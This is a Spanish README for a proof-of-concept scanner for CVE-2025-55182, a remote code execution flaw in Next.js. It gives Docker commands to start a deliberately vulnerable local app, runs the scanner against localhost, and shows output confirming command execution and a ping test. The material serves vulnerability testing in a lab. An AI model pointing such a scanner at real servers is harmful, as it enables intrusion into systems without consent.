
Escáner seguro de prueba de concepto para CVE-2025-55182 con un stand vulnerable de Next.js basado en Docker para probar la ejecución remota de código.
cd Stand
docker compose up --build
La aplicación vulnerable se ejecuta en: http://localhost:3011
cd PoC/src
poetry install
poetry run python scanner.py http://localhost:3011
[*] Scanning target: http://localhost:3011
[+] VULNERABLE! RCE confirmed.
[+] Command output (id): uid=1001(nextjs)...
[+] Network test (ping) SUCCESSFUL.
[*] Results saved to 'result.txt'.
El archivo result.txt contendrá: [{"ip": "http://localhost:3011", "vuln": true}]
PoC/ – Escáner seguro (Dockerfile, scanner.py)Stand/ – Aplicación Next.js vulnerable (Docker)README.md – Este archivo